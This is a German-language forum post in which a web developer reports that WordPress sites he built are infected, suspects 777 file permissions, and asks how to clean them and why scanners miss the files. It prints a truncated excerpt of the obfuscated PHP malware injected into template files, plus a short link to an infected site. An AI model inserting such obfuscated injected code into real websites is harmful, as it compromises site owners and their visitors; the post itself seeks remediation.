Hallo zusammen
Seit nun mehr als einem Monat scheinen immer mehr Websites die ich gemacht habe von Malware befallen zu sein.
Bis jetzt habe ich den Malwarecode nur in den Template Files gefunden. Nun habe ich einpaar Fragen:
- Was ist die beste oder sicherste Rechtevergabe für Wordpress? Ich nehme an dass die Mutation an den Templates durch die Berechtigung 777 reingekommen ist!?
- Wie soll ich am besten vorgehen um die Bereinigung durchzuführen?
- Ist jemand Interessiert mir dabei zu helfen, natürlich zahle ich dafür?
- Warum erkennt kein Online Malware Scanner diese Files?
Eine befallene Seite: http://goo.gl/AwdJuP
Der Code den ich z.B. in der index.php finde ist der folgende (kleiner Auszug):
<?php if(!isset($GLOBALS["\x61\156\x75\156\x61"])) { $ua=strtolower($_SERVER["\x48\124\x54\120\x5f\125\x53\105\x52\137\x41\107\x45\116\x54"]); if ((! strstr($ua,"\x6d\163\x69\145")) and (! strstr($ua,"\x72\166\x3a\61\x31"))) $GLOBALS["\x61\156\x75\156\x61"]=1; } ?><?php $fnoskvkgpx = 'x7825b:>1<!gps)%x5c%x7825j:>1<%x5c%x7825j:=tj{fpg)%x5c%x7825s:*<<.3%x5c%x7860hA%x5c%x7827pd%x5c%x78256<pd%x5c75ttfsqnpdov{h19275j{hnpd19275fubmgoj{h1:|:*mmC%x5c%x7827&6<*rfs%x5c%x78257-K)fujs:~:<*9-1-r%x5c%x7825)s%x5c%x7825>%x5c%x782fh%x5c%x7825:<!*!+A!>!?>
Jede PHP Datei vom Template ist befallen.
Gruss zyclop